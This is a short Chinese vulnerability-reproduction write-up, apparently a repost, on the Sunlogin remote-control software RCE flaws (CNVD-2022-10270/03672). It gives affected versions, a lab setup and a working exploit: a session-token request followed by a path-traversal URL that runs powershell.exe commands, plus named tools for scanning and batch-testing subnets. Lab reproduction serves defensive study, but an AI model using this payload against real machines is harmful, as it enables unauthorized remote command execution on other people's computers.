本文转载自助安社区(https://secself.com/),海量入门学习资料。
date: 2023-03-25 15:24:00
tags:
- 渗透测试
- 漏洞复现
categories:
- CNVD-2022-03672
- CNVD-2022-10270
- 向日葵RCE
keywords: 渗透测试,漏洞复现,CNVD-2022-03672,CNVD-2022-10270
前言
向日葵是一款免费的集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。
于2022年2月5日和2022年2月15日,CNVD公开上海贝锐信息科技股份有限公司的向日葵远控软件存在远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672),影响Windows系统使用的个人版和简约版,攻击者可利用该漏洞获取服务器控制权。
影响版本
向日葵个人版 for Windows <= 11.0.0.33
向日葵简约版 <= V1.0.1.43315(2021.12)
漏洞级别
高危
环境搭建
在虚拟机里安装11.0.0.33的低版本向日葵
漏洞复现
使用nmap或其他工具探测目标端口
在浏览器中访问ip+端口号+cgi-bin/rpc?action=verify-haras (端口号:每一个都尝试,直到获取到session值CID)
Cookies添加拿到的CID后加上payload请求
http://192.168.52.133:49437/check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+ whoami
手动复现完成
工具使用
使用工具自带的扫描
xrkRce.exe
-h ip -t scan
测试命令执行
批量检测
python3 sunlogin-fuzz.py -t 192.168.52.128/25
相关工具文件,安装包私信公众号向日葵获取